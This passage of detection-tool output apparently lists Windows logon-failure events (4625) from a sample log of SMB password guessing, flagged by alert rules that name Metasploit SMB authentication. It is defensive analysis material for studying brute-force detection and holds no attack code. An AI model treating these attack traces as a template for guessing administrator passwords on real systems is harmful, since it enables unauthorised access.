Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 